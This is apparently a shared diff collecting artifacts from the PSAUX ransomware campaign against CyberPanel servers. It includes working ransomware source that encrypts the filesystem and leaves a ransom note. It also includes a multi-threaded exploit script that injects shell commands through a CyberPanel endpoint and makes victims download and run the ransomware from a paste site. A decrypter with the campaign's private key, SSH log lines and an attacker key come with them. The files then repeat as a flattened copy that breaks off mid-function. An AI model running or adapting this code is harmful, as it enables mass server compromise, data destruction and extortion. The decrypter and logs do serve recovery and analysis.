saurindashadia · November 6, 2024 03:27
diff --git a/00-README.md b/00-README.md
diff --git a/1-decrypt.sh b/1-decrypt.sh
 #!/bin/bash

 ######################################################################################
 #                    LeakIX PSAUX CyberPanel Ransom campaign decrypter               #
 #                                                                                    #
 #                    You have been blessed by PSAUX                                  #
 #                                                                                    #
 #                    All your files can be decrypted.                                #
 #                                                                                    #
 #                                                                                    #
 # Telegram: @psauxsec                                                                #
 #                                                                                    #
 # Fun must be made on that channel for weak crypto,                                  #
 #                                                                                    #
 #  Ransomware Rushed by PSAUX                                                        #
 #                                                                                    #
 ######################################################################################

 # WARNING, WE ARE AWARE OF MULTIPLE ENCRYPTION ATTACKS. THIS SCRIPT WORKS WHEN YOUR FILES ARE ENCRYPTED WITH .psaux EXTENSION
 # WARNING, ALWAYS WORK ON A COPY OF YOUR DATA, ENCRYPTED OR NOT
 # WARNING, THIS SCRIPT WILL RESTORE FILES FROM THE TIME THEY WERE ENCRYPTED, BACKUP ANY CHANGES MADE AFTER THE HACK


 ### Fail the script if anything's wrong, that's people's data we're dealing with
 set -e

 echo "Running PSAUX CyberPanel decrypter..."

 ### Master key gently provided by PSAUX

 MASTER_KEY="-----BEGIN PRIVATE KEY-----
 MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDFiVLFtwUUcizD
 4gUkRJayJQFAW79ZojEE8YLLnfF5x5Z1A2hP/qT21LMOmvMz03gu9Jn3G+Iby8cx
 4OtvUDuG0tx+Cbq2u2lJj+ZmL11mMMbbR9aTWZhGmdVY3T9X2dObJSV94F5Itd3s
 SSf4A+Osb2Ea2Ci6BCK6mCXw7Qrwr4epWuwUiZ2JqfX3Iv5oLmwLOKF/nOM0XzIp
 fyopK10C/Di5erPBIAV2SYQh7sZ0JKRH7biL+s9dPM2e+8Ckuvkqkb1O1lIpOh8j
 8N/dxn/y9w53KGYsSOaN0ZHseBNCbIwW1s22q4iG/p5d+UG+kTRc8HqdmENw65Vv
 S8ycNPnZAgMBAAECggEBAIRgjZ7AEuBrz0IKIqX2bQK/N8J4eZhI0A7fBmcL1npk
 3ZhXCz2oicZ8Le6Yumi9y6mz88Yc4n78JeZwM3aqTuoAPxEb1guFNn68t4s9LJtC
 DtF+p/ahMSIHD2l5A20NJfivgRuFE8ooTqt9LxLPEHFLRsjlmQ1nnhprweleAVnf
 Kl66kGZa/lAF99P7g4+3/hukVHMRPKCCEmc/77bgIw7gXe/lRutFReraGdziGky3
 VkDIx7MUdGp+n4Hf4iqtUzpinN0IlvgFiMvH4aoAr5vDHitEOGuaovyeA51c2qJw
 RGIAJPgWdaKj7yJl65uLmZPLxel2MCrOHqn8jv1zzw0CgYEA47kmxIT9JXoH3r0y
 kxxgzR+W9FiIM+MP01F2IfoELNXP0yCZ5sSQ2p+gT61wwTZWvzmzkE8w+AcsJirs
 ntlTyG5pJNQYTBSJW9lRoXykpgyRyhpEy7OES1NlWslWM2kthJQ/XZiAfaJ504ZL
 cw4q3PhvcSofknRyYpLEYJ8nyg8CgYEA3hCYarpOrDxN55TB5rdU7adX4b6faK2z
 NuV/grn8qqpG4nB1jj8tQI5q1NTzBe4ngLdJ6+uyGln7WvIr0llaCnhJo2Yp4EhX
 5vNw3cKSdlJynZtp3k9FidhMfjrzzX3d7q7n3BFk/UgUPMRDM85q3qZzSEqLy3wI
 G/WCqmMNhZcCgYBOFKMFSPAflHr0VXzs0hMi4gz5VQ3GdLltZIYT2kzqLpmms4vx
 gz6Dp63pA/ggV4hg4uD9vxl0QclSgO9G/A9tLuZgWVTHaVc7pgUGUN2HjdHDMUSb
 b78RsNOU0Gn9ELgpuEcNyYdtDHOnImnmVlo+D/TuIVpX9hNuVxJ8arXS4wKBgC5I
 MSwVVm5JR0db1qnaTeYWOZfAHgM4KKDpZhD96G49fPaWz7ls62aICDYBiAEVaMBH
 8y0re3xIgr2quX1myABkn5xhn5qyGTf2RvDBK7tjZaX5jTAbP3gCT7cDXGrYr9ee
 No7ERVMQob8kfIkgnV94O5C2kLpBSINjQO94I4pTAoGASChZYdSvI46zNc8EnlcD
 G7V1y3S8/Yxg3Nf7wl+s5Qot6CBRmlOOlMMQQ0JQgT5YZWcTM0IP5fEiiO6rt+w/
 zHSS1/V+QNyxwb3nZhxwe0yWyqBKvDfmmxI0pRal7L6RZE9tqh40tn+Ksw4ykg5R
 yROWtY+JIbuJJb26/Z5/4KQ=
 -----END PRIVATE KEY-----"
 echo "$MASTER_KEY" > /tmp/private.pem

 MASTER_KEY_PATH="/tmp/private.pem"

 # Decrypt the encryption key with the master key
 openssl pkeyutl -decrypt -inkey /tmp/private.pem -in /var/key.enc -out /tmp/key.enc
 openssl pkeyutl -decrypt -inkey /tmp/private.pem -in /var/iv.enc -out /tmp/iv.enc

 local_key=$(cat /tmp/key.enc|xxd -p)
 local_iv=$(cat /tmp/iv.enc|xxd -p)

 echo "Recovered key: $local_key IV: $local_iv"


 # Find all psaux file and decrypt them
 find / -name "*.psaux" -type f|while read file; do
  openssl enc -aes-128-cbc -d -K ${local_key} -iv ${local_iv} -in "${file}" -out "${file%\.psaux}" && rm "${file}"
  echo "Restored ${file%\.psaux}"
 done
diff --git a/actually.sh b/actually.sh
 #!/usr/bin/env bash

 private="-----BEGIN PRIVATE KEY-----
 MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDFiVLFtwUUcizD
 4gUkRJayJQFAW79ZojEE8YLLnfF5x5Z1A2hP/qT21LMOmvMz03gu9Jn3G+Iby8cx
 4OtvUDuG0tx+Cbq2u2lJj+ZmL11mMMbbR9aTWZhGmdVY3T9X2dObJSV94F5Itd3s
 SSf4A+Osb2Ea2Ci6BCK6mCXw7Qrwr4epWuwUiZ2JqfX3Iv5oLmwLOKF/nOM0XzIp
 fyopK10C/Di5erPBIAV2SYQh7sZ0JKRH7biL+s9dPM2e+8Ckuvkqkb1O1lIpOh8j
 8N/dxn/y9w53KGYsSOaN0ZHseBNCbIwW1s22q4iG/p5d+UG+kTRc8HqdmENw65Vv
 S8ycNPnZAgMBAAECggEBAIRgjZ7AEuBrz0IKIqX2bQK/N8J4eZhI0A7fBmcL1npk
 3ZhXCz2oicZ8Le6Yumi9y6mz88Yc4n78JeZwM3aqTuoAPxEb1guFNn68t4s9LJtC
 DtF+p/ahMSIHD2l5A20NJfivgRuFE8ooTqt9LxLPEHFLRsjlmQ1nnhprweleAVnf
 Kl66kGZa/lAF99P7g4+3/hukVHMRPKCCEmc/77bgIw7gXe/lRutFReraGdziGky3
 VkDIx7MUdGp+n4Hf4iqtUzpinN0IlvgFiMvH4aoAr5vDHitEOGuaovyeA51c2qJw
 RGIAJPgWdaKj7yJl65uLmZPLxel2MCrOHqn8jv1zzw0CgYEA47kmxIT9JXoH3r0y
 kxxgzR+W9FiIM+MP01F2IfoELNXP0yCZ5sSQ2p+gT61wwTZWvzmzkE8w+AcsJirs
 ntlTyG5pJNQYTBSJW9lRoXykpgyRyhpEy7OES1NlWslWM2kthJQ/XZiAfaJ504ZL
 cw4q3PhvcSofknRyYpLEYJ8nyg8CgYEA3hCYarpOrDxN55TB5rdU7adX4b6faK2z
 NuV/grn8qqpG4nB1jj8tQI5q1NTzBe4ngLdJ6+uyGln7WvIr0llaCnhJo2Yp4EhX
 5vNw3cKSdlJynZtp3k9FidhMfjrzzX3d7q7n3BFk/UgUPMRDM85q3qZzSEqLy3wI
 G/WCqmMNhZcCgYBOFKMFSPAflHr0VXzs0hMi4gz5VQ3GdLltZIYT2kzqLpmms4vx
 gz6Dp63pA/ggV4hg4uD9vxl0QclSgO9G/A9tLuZgWVTHaVc7pgUGUN2HjdHDMUSb
 b78RsNOU0Gn9ELgpuEcNyYdtDHOnImnmVlo+D/TuIVpX9hNuVxJ8arXS4wKBgC5I
 MSwVVm5JR0db1qnaTeYWOZfAHgM4KKDpZhD96G49fPaWz7ls62aICDYBiAEVaMBH
 8y0re3xIgr2quX1myABkn5xhn5qyGTf2RvDBK7tjZaX5jTAbP3gCT7cDXGrYr9ee
 No7ERVMQob8kfIkgnV94O5C2kLpBSINjQO94I4pTAoGASChZYdSvI46zNc8EnlcD
 G7V1y3S8/Yxg3Nf7wl+s5Qot6CBRmlOOlMMQQ0JQgT5YZWcTM0IP5fEiiO6rt+w/
 zHSS1/V+QNyxwb3nZhxwe0yWyqBKvDfmmxI0pRal7L6RZE9tqh40tn+Ksw4ykg5R
 yROWtY+JIbuJJb26/Z5/4KQ=
 -----END PRIVATE KEY-----"
 echo "$private" > /var/private.pem

 key_name="s2zp8fks9a0L"
 echo "Encryption ID: ${key_name}"

 PRIVATE_KEY_PATH="/var/private.pem"

 if [ ! -f "$PRIVATE_KEY_PATH" ]; then
  echo "Private key not found at $PRIVATE_KEY_PATH"
  exit 1
 fi

 PRIVATE_KEY=$(cat $PRIVATE_KEY_PATH)
 if [ -z "$PRIVATE_KEY" ]; then
  echo "Could not read the private key (maybe permission issue?)"
  exit 1
 fi
 echo "Private Key SSL: $(echo "$PRIVATE_KEY" | head -n 1)..."

 login_message="


 ######################################################################################
 #               Encryptions ID : ${key_name}                                         #                
 #                    You have been hacked by PSAUX                                   #
 #                                                                                    #
 #                    All your files have been encrypted.                             #
 #                                                                                    #
 # To restore access, you can contact us in Telegram                                  #
 #                                                                                    #
 # Telegram: @psauxsec                                                                #
 #                                                                                    #
 # Payment must be made in cryptocurrency.                                            #
 #                                                                                    #
 # The price for decryption is 200 dollars.                                           #
 # Sample decryption can be served upon request.                                      #
 #                                                                                    #
 # After payment, you will receive a key to run the decrypter script                  #
 # on your system to restore your files.                                              #
 # All your database is downloaded and if you are not going to pay in next 3 days     #
 # its going to be published in darknet. Best Regards!                                #
 #                                                                                    #
 #                                                                                    #
 #                                                                                    #
 #  Ransomware Made by PSAUX                                                          #
 #                                                                                    #
 ######################################################################################


 "
 echo "$login_message" > /etc/motd

 key=$(openssl rand -hex 16)
 iv=$(openssl rand -hex 16)
 echo "Generated key: ${key}"
 echo "Generated IV: ${iv}"

 echo -n $key | xxd -r -p | openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/key.enc
 if [ $? -eq 0 ]; then
    echo "Key encrypted successfully: /var/key.enc"
 else
    echo "Error with key encryption"
    exit 1
 fi

 echo -n $iv | xxd -r -p | openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/iv.enc
 if [ $? -eq 0 ]; then
    echo "IV encrypted successfully: /var/iv.enc"
 else
    echo "Error with IV encryption"
    exit 1
 fi

 excluded_dirs=(
    "/proc"
    "/sys"
    "/dev"
    "/run"
    "/etc"
    "/usr"
    "/tmp"
    "/var/run"
    "/var/lock"
    "/var/tmp"
    "/mnt"
    "/sbin"
    "/lib64"
    "/bin"
    "/boot"
    "/lib"
    "/lib32"
    "/srv"
    "/libx32"
    "/media"
    "/lost+found"
 )

 excluded_files=(
    "/var/key.enc"
    "/var/iv.enc"
    "/var/decrypter.sh"
    "/var/index_template.html"
 )

 is_excluded() {
    local path=$1
    for excluded in "${excluded_dirs[@]}"; do
        if [[ "$path" == "$excluded"* ]]; then
            return 0
        fi
    done
    for excluded in "${excluded_files[@]}"; do
        if [[ "$path" == "$excluded" ]]; then
            return 0
        fi
    done
    return 1
 }

 encrypt_directory() {
    local dir=$1
    echo "Encrypting directory: $dir"
    find "$dir" -type f -print0 | while IFS= read -r -d '' file; do
        if ! is_excluded "$file"; then
            echo "Encrypting file: $file"
            openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux"
            if [ $? -eq 0 ]; then
                echo "[+] : ${file}.psaux"
                rm -f "$file"
            else
                echo "Error encrypting: $file"
            fi
        else
            echo "Excluded file: $file"
        fi
    done
 }

 encrypt_directory "/"

 find / -type d \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found \) -prune -o -type d -print0 | while IFS= read -r -d '' dir; do
    if ! is_excluded "$dir"; then
        cp /var/index_template.html "$dir/index.html"
    fi
 done

 find / -type f \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found -o -name "*.psaux" -o -name "index.html" -o -name "decrypter.sh" \) -prune -o -type f -print0 | while IFS= read -r -d '' file; do
    if ! is_excluded "$file"; then
        echo "[+] : $file"
        openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux"
        if [ $? -eq 0 ]; then
            echo "[+] : ${file}.psaux"
            rm -f "$file"
        else
            echo "Error encrypting: $file"
        fi
    else
        echo "Excluded file: $file"
    fi
 done

 rm -- "$0" && exit 0
diff --git a/ak47.py b/ak47.py
 import httpx
 import sys
 import time
 from concurrent.futures import ThreadPoolExecutor, as_completed

 def get_CSRF_token(client):
    try:
        resp = client.get("/")
        if resp.status_code == 200:
            return resp.cookies.get('csrftoken')
        else:
            print(f"Failed to connect to {client.base_url}. Status code: {resp.status_code}")
            return None
    except httpx.RequestError:
        print(f"Failed to connect to {client.base_url}")
        return None

 def pwn(client, CSRF_token, cmd):
    if not CSRF_token:
        return "No CSRF token"

    headers = {
        "X-CSRFToken": CSRF_token,
        "Content-Type": "application/json",
        "Referer": str(client.base_url)
    }
    
    payload = '{"statusfile":"/dev/null; %s; #","csrftoken":"%s"}' % (cmd, CSRF_token)
    try:
        response = client.put("/dataBases/upgrademysqlstatus", headers=headers, data=payload)
        if response.headers.get("Content-Type", "").startswith("application/json"):
            return response.json().get("requestStatus", "No response")
        else:
            print(f"Unexpected response type from {client.base_url}: {response.text}")
            return "Unexpected response"
    except httpx.RequestError:
        return "Failed to execute"

 def execute_command(client, command):
    CSRF_token = get_CSRF_token(client)
    if not CSRF_token:
        print(f"Could not retrieve CSRF token from {client.base_url}")
        return "Failed to retrieve CSRF token"
    
    print(f"Executing: {command} on {client.base_url}")
    stdout = pwn(client, CSRF_token, command)
    print(stdout)
    return stdout

 def process_target(target):
    print(f"Processing target: {target}")
    try:
        client = httpx.Client(base_url=target, verify=False, timeout=5.0)

        # Step 1: Download the file
        if "Failed" in execute_command(client, "curl -L https://www.paste.tc/raw/asd-41506 -o /var/actually.sh"):
            return
        
        # Step 2: Check if the file exists, retry if necessary
        file_exists = False
        while not file_exists:
            response = execute_command(client, "ls /var/actually.sh")
            if "No such file or directory" not in response:
                file_exists = True
                print("File found. Proceeding with further steps...")
            else:
                print("File not found. Waiting for the download to complete...")
                time.sleep(2)  # Wait for 2 seconds before checking again

        # Step 3: Change permissions for the downloaded file
        execute_command(client, "chmod +x /var/actually.sh")

        # Step 4: Remove any carriage return issues
        execute_command(client, "sed -i 's/\r//g' /var/actually.sh")

        # Step 5: Execute the script with nohup to detach and log to /dev/null
        execute_command(client, "nohup /var/actually.sh")

        print("Script executed and detached.")
    except httpx.RequestError as e:
        print(f"Could not connect to {target}. Error: {str(e)}")

 def main(targets_file, max_threads=5):
    try:
        with open(targets_file, "r") as file:
            targets = [line.strip() for line in file if line.strip()]

        with ThreadPoolExecutor(max_threads) as executor:
            future_to_target = {executor.submit(process_target, target): target for target in targets}

            for future in as_completed(future_to_target):
                target = future_to_target[future]
                try:
                    future.result()
                except Exception as exc:
                    print(f"{target} generated an exception: {exc}")

    except FileNotFoundError:
        print(f"Error: File {targets_file} not found.")
        sys.exit(1)

 if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 ak48.py targets.txt [max_threads]")
        sys.exit(1)

    targets_file = sys.argv[1]
    max_threads = int(sys.argv[2]) if len(sys.argv) > 2 else 5

    main(targets_file, max_threads)
diff --git a/auth.log b/auth.log
 Oct 29 12:01:15 ready sshd[2293619]: Accepted password for root from 188.119.27.24 port 31771 ssh2
 Oct 29 12:35:48 ready sshd[2294265]: Accepted password for root from 188.119.27.24 port 30923 ssh2
 Oct 29 13:25:23 ready sshd[2294914]: Accepted password for root from 188.119.27.24 port 31508 ssh2
 Oct 29 14:04:22 ready sshd[2295536]: Accepted password for root from 188.119.27.24 port 31502 ssh2
 Oct 29 14:15:47 ready sshd[2296023]: Accepted password for root from 188.119.27.24 port 31334 ssh2
diff --git a/ssh-authorized_keys b/ssh-authorized_keys
 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsrBV2UGqNIQ8iL3j3/yh+qi7Q76plJteqTmS2EdQ4A8HR6yckuRnyr5s0UVDI/eiAZpiNKDDpipwULl22Sih96vFOJkKpON5bxQ4NwUFQ7Fq7wheBK9PBQ5owuBrOqIeY3D846kNejNJhDOcIiDYN9KqCeP+EGlKTFb68/nifQkPychx+z4MEm39pB7CKS+EFXsOoCmBntb7wduZf0spLtstd+bTSFxwbdgSNQU2iabazLYG05LQWTc4+Zv574Wt4608PjGE2uyofxO69XFtiYy9LvNtzmLOlJYy89M3HdQgfGzrWVC8QLLsZvuQsrRPDFb4/2/KJ5KyT9rg7qGeQQ== Suphachai
	#!/bin/bash

	######################################################################################
	# LeakIX PSAUX CyberPanel Ransom campaign decrypter #
	# #
	# You have been blessed by PSAUX #
	# #
	# All your files can be decrypted. #
	# #
	# #
	# Telegram: @psauxsec #
	# #
	# Fun must be made on that channel for weak crypto, #
	# #
	# Ransomware Rushed by PSAUX #
	# #
	######################################################################################

	# WARNING, WE ARE AWARE OF MULTIPLE ENCRYPTION ATTACKS. THIS SCRIPT WORKS WHEN YOUR FILES ARE ENCRYPTED WITH .psaux EXTENSION
	# WARNING, ALWAYS WORK ON A COPY OF YOUR DATA, ENCRYPTED OR NOT
	# WARNING, THIS SCRIPT WILL RESTORE FILES FROM THE TIME THEY WERE ENCRYPTED, BACKUP ANY CHANGES MADE AFTER THE HACK


	### Fail the script if anything's wrong, that's people's data we're dealing with
	set -e

	echo "Running PSAUX CyberPanel decrypter..."

	### Master key gently provided by PSAUX

	MASTER_KEY="-----BEGIN PRIVATE KEY-----
	MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDFiVLFtwUUcizD
	4gUkRJayJQFAW79ZojEE8YLLnfF5x5Z1A2hP/qT21LMOmvMz03gu9Jn3G+Iby8cx
	4OtvUDuG0tx+Cbq2u2lJj+ZmL11mMMbbR9aTWZhGmdVY3T9X2dObJSV94F5Itd3s
	SSf4A+Osb2Ea2Ci6BCK6mCXw7Qrwr4epWuwUiZ2JqfX3Iv5oLmwLOKF/nOM0XzIp
	fyopK10C/Di5erPBIAV2SYQh7sZ0JKRH7biL+s9dPM2e+8Ckuvkqkb1O1lIpOh8j
	8N/dxn/y9w53KGYsSOaN0ZHseBNCbIwW1s22q4iG/p5d+UG+kTRc8HqdmENw65Vv
	S8ycNPnZAgMBAAECggEBAIRgjZ7AEuBrz0IKIqX2bQK/N8J4eZhI0A7fBmcL1npk
	3ZhXCz2oicZ8Le6Yumi9y6mz88Yc4n78JeZwM3aqTuoAPxEb1guFNn68t4s9LJtC
	DtF+p/ahMSIHD2l5A20NJfivgRuFE8ooTqt9LxLPEHFLRsjlmQ1nnhprweleAVnf
	Kl66kGZa/lAF99P7g4+3/hukVHMRPKCCEmc/77bgIw7gXe/lRutFReraGdziGky3
	VkDIx7MUdGp+n4Hf4iqtUzpinN0IlvgFiMvH4aoAr5vDHitEOGuaovyeA51c2qJw
	RGIAJPgWdaKj7yJl65uLmZPLxel2MCrOHqn8jv1zzw0CgYEA47kmxIT9JXoH3r0y
	kxxgzR+W9FiIM+MP01F2IfoELNXP0yCZ5sSQ2p+gT61wwTZWvzmzkE8w+AcsJirs
	ntlTyG5pJNQYTBSJW9lRoXykpgyRyhpEy7OES1NlWslWM2kthJQ/XZiAfaJ504ZL
	cw4q3PhvcSofknRyYpLEYJ8nyg8CgYEA3hCYarpOrDxN55TB5rdU7adX4b6faK2z
	NuV/grn8qqpG4nB1jj8tQI5q1NTzBe4ngLdJ6+uyGln7WvIr0llaCnhJo2Yp4EhX
	5vNw3cKSdlJynZtp3k9FidhMfjrzzX3d7q7n3BFk/UgUPMRDM85q3qZzSEqLy3wI
	G/WCqmMNhZcCgYBOFKMFSPAflHr0VXzs0hMi4gz5VQ3GdLltZIYT2kzqLpmms4vx
	gz6Dp63pA/ggV4hg4uD9vxl0QclSgO9G/A9tLuZgWVTHaVc7pgUGUN2HjdHDMUSb
	b78RsNOU0Gn9ELgpuEcNyYdtDHOnImnmVlo+D/TuIVpX9hNuVxJ8arXS4wKBgC5I
	MSwVVm5JR0db1qnaTeYWOZfAHgM4KKDpZhD96G49fPaWz7ls62aICDYBiAEVaMBH
	8y0re3xIgr2quX1myABkn5xhn5qyGTf2RvDBK7tjZaX5jTAbP3gCT7cDXGrYr9ee
	No7ERVMQob8kfIkgnV94O5C2kLpBSINjQO94I4pTAoGASChZYdSvI46zNc8EnlcD
	G7V1y3S8/Yxg3Nf7wl+s5Qot6CBRmlOOlMMQQ0JQgT5YZWcTM0IP5fEiiO6rt+w/
	zHSS1/V+QNyxwb3nZhxwe0yWyqBKvDfmmxI0pRal7L6RZE9tqh40tn+Ksw4ykg5R
	yROWtY+JIbuJJb26/Z5/4KQ=
	-----END PRIVATE KEY-----"
	echo "$MASTER_KEY" > /tmp/private.pem

	MASTER_KEY_PATH="/tmp/private.pem"

	# Decrypt the encryption key with the master key
	openssl pkeyutl -decrypt -inkey /tmp/private.pem -in /var/key.enc -out /tmp/key.enc
	openssl pkeyutl -decrypt -inkey /tmp/private.pem -in /var/iv.enc -out /tmp/iv.enc

	local_key=$(cat /tmp/key.enc\|xxd -p)
	local_iv=$(cat /tmp/iv.enc\|xxd -p)

	echo "Recovered key: $local_key IV: $local_iv"


	# Find all psaux file and decrypt them
	find / -name "*.psaux" -type f\|while read file; do
	openssl enc -aes-128-cbc -d -K ${local_key} -iv ${local_iv} -in "${file}" -out "${file%\.psaux}" && rm "${file}"
	echo "Restored ${file%\.psaux}"
	done
	#!/usr/bin/env bash

	private="-----BEGIN PRIVATE KEY-----
	MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDFiVLFtwUUcizD
	4gUkRJayJQFAW79ZojEE8YLLnfF5x5Z1A2hP/qT21LMOmvMz03gu9Jn3G+Iby8cx
	4OtvUDuG0tx+Cbq2u2lJj+ZmL11mMMbbR9aTWZhGmdVY3T9X2dObJSV94F5Itd3s
	SSf4A+Osb2Ea2Ci6BCK6mCXw7Qrwr4epWuwUiZ2JqfX3Iv5oLmwLOKF/nOM0XzIp
	fyopK10C/Di5erPBIAV2SYQh7sZ0JKRH7biL+s9dPM2e+8Ckuvkqkb1O1lIpOh8j
	8N/dxn/y9w53KGYsSOaN0ZHseBNCbIwW1s22q4iG/p5d+UG+kTRc8HqdmENw65Vv
	S8ycNPnZAgMBAAECggEBAIRgjZ7AEuBrz0IKIqX2bQK/N8J4eZhI0A7fBmcL1npk
	3ZhXCz2oicZ8Le6Yumi9y6mz88Yc4n78JeZwM3aqTuoAPxEb1guFNn68t4s9LJtC
	DtF+p/ahMSIHD2l5A20NJfivgRuFE8ooTqt9LxLPEHFLRsjlmQ1nnhprweleAVnf
	Kl66kGZa/lAF99P7g4+3/hukVHMRPKCCEmc/77bgIw7gXe/lRutFReraGdziGky3
	VkDIx7MUdGp+n4Hf4iqtUzpinN0IlvgFiMvH4aoAr5vDHitEOGuaovyeA51c2qJw
	RGIAJPgWdaKj7yJl65uLmZPLxel2MCrOHqn8jv1zzw0CgYEA47kmxIT9JXoH3r0y
	kxxgzR+W9FiIM+MP01F2IfoELNXP0yCZ5sSQ2p+gT61wwTZWvzmzkE8w+AcsJirs
	ntlTyG5pJNQYTBSJW9lRoXykpgyRyhpEy7OES1NlWslWM2kthJQ/XZiAfaJ504ZL
	cw4q3PhvcSofknRyYpLEYJ8nyg8CgYEA3hCYarpOrDxN55TB5rdU7adX4b6faK2z
	NuV/grn8qqpG4nB1jj8tQI5q1NTzBe4ngLdJ6+uyGln7WvIr0llaCnhJo2Yp4EhX
	5vNw3cKSdlJynZtp3k9FidhMfjrzzX3d7q7n3BFk/UgUPMRDM85q3qZzSEqLy3wI
	G/WCqmMNhZcCgYBOFKMFSPAflHr0VXzs0hMi4gz5VQ3GdLltZIYT2kzqLpmms4vx
	gz6Dp63pA/ggV4hg4uD9vxl0QclSgO9G/A9tLuZgWVTHaVc7pgUGUN2HjdHDMUSb
	b78RsNOU0Gn9ELgpuEcNyYdtDHOnImnmVlo+D/TuIVpX9hNuVxJ8arXS4wKBgC5I
	MSwVVm5JR0db1qnaTeYWOZfAHgM4KKDpZhD96G49fPaWz7ls62aICDYBiAEVaMBH
	8y0re3xIgr2quX1myABkn5xhn5qyGTf2RvDBK7tjZaX5jTAbP3gCT7cDXGrYr9ee
	No7ERVMQob8kfIkgnV94O5C2kLpBSINjQO94I4pTAoGASChZYdSvI46zNc8EnlcD
	G7V1y3S8/Yxg3Nf7wl+s5Qot6CBRmlOOlMMQQ0JQgT5YZWcTM0IP5fEiiO6rt+w/
	zHSS1/V+QNyxwb3nZhxwe0yWyqBKvDfmmxI0pRal7L6RZE9tqh40tn+Ksw4ykg5R
	yROWtY+JIbuJJb26/Z5/4KQ=
	-----END PRIVATE KEY-----"
	echo "$private" > /var/private.pem

	key_name="s2zp8fks9a0L"
	echo "Encryption ID: ${key_name}"

	PRIVATE_KEY_PATH="/var/private.pem"

	if [ ! -f "$PRIVATE_KEY_PATH" ]; then
	echo "Private key not found at $PRIVATE_KEY_PATH"
	exit 1
	fi

	PRIVATE_KEY=$(cat $PRIVATE_KEY_PATH)
	if [ -z "$PRIVATE_KEY" ]; then
	echo "Could not read the private key (maybe permission issue?)"
	exit 1
	fi
	echo "Private Key SSL: $(echo "$PRIVATE_KEY" \| head -n 1)..."

	login_message="


	######################################################################################
	# Encryptions ID : ${key_name} #
	# You have been hacked by PSAUX #
	# #
	# All your files have been encrypted. #
	# #
	# To restore access, you can contact us in Telegram #
	# #
	# Telegram: @psauxsec #
	# #
	# Payment must be made in cryptocurrency. #
	# #
	# The price for decryption is 200 dollars. #
	# Sample decryption can be served upon request. #
	# #
	# After payment, you will receive a key to run the decrypter script #
	# on your system to restore your files. #
	# All your database is downloaded and if you are not going to pay in next 3 days #
	# its going to be published in darknet. Best Regards! #
	# #
	# #
	# #
	# Ransomware Made by PSAUX #
	# #
	######################################################################################


	"
	echo "$login_message" > /etc/motd

	key=$(openssl rand -hex 16)
	iv=$(openssl rand -hex 16)
	echo "Generated key: ${key}"
	echo "Generated IV: ${iv}"

	echo -n $key \| xxd -r -p \| openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/key.enc
	if [ $? -eq 0 ]; then
	echo "Key encrypted successfully: /var/key.enc"
	else
	echo "Error with key encryption"
	exit 1
	fi

	echo -n $iv \| xxd -r -p \| openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/iv.enc
	if [ $? -eq 0 ]; then
	echo "IV encrypted successfully: /var/iv.enc"
	else
	echo "Error with IV encryption"
	exit 1
	fi

	excluded_dirs=(
	"/proc"
	"/sys"
	"/dev"
	"/run"
	"/etc"
	"/usr"
	"/tmp"
	"/var/run"
	"/var/lock"
	"/var/tmp"
	"/mnt"
	"/sbin"
	"/lib64"
	"/bin"
	"/boot"
	"/lib"
	"/lib32"
	"/srv"
	"/libx32"
	"/media"
	"/lost+found"
	)

	excluded_files=(
	"/var/key.enc"
	"/var/iv.enc"
	"/var/decrypter.sh"
	"/var/index_template.html"
	)

	is_excluded() {
	local path=$1
	for excluded in "${excluded_dirs[@]}"; do
	if [[ "$path" == "$excluded"* ]]; then
	return 0
	fi
	done
	for excluded in "${excluded_files[@]}"; do
	if [[ "$path" == "$excluded" ]]; then
	return 0
	fi
	done
	return 1
	}

	encrypt_directory() {
	local dir=$1
	echo "Encrypting directory: $dir"
	find "$dir" -type f -print0 \| while IFS= read -r -d '' file; do
	if ! is_excluded "$file"; then
	echo "Encrypting file: $file"
	openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux"
	if [ $? -eq 0 ]; then
	echo "[+] : ${file}.psaux"
	rm -f "$file"
	else
	echo "Error encrypting: $file"
	fi
	else
	echo "Excluded file: $file"
	fi
	done
	}

	encrypt_directory "/"

	find / -type d \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found \) -prune -o -type d -print0 \| while IFS= read -r -d '' dir; do
	if ! is_excluded "$dir"; then
	cp /var/index_template.html "$dir/index.html"
	fi
	done

	find / -type f \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found -o -name "*.psaux" -o -name "index.html" -o -name "decrypter.sh" \) -prune -o -type f -print0 \| while IFS= read -r -d '' file; do
	if ! is_excluded "$file"; then
	echo "[+] : $file"
	openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux"
	if [ $? -eq 0 ]; then
	echo "[+] : ${file}.psaux"
	rm -f "$file"
	else
	echo "Error encrypting: $file"
	fi
	else
	echo "Excluded file: $file"
	fi
	done

	rm -- "$0" && exit 0
	import httpx
	import sys
	import time
	from concurrent.futures import ThreadPoolExecutor, as_completed

	def get_CSRF_token(client):
	try:
	resp = client.get("/")
	if resp.status_code == 200:
	return resp.cookies.get('csrftoken')
	else:
	print(f"Failed to connect to {client.base_url}. Status code: {resp.status_code}")
	return None
	except httpx.RequestError:
	print(f"Failed to connect to {client.base_url}")
	return None

	def pwn(client, CSRF_token, cmd):
	if not CSRF_token:
	return "No CSRF token"
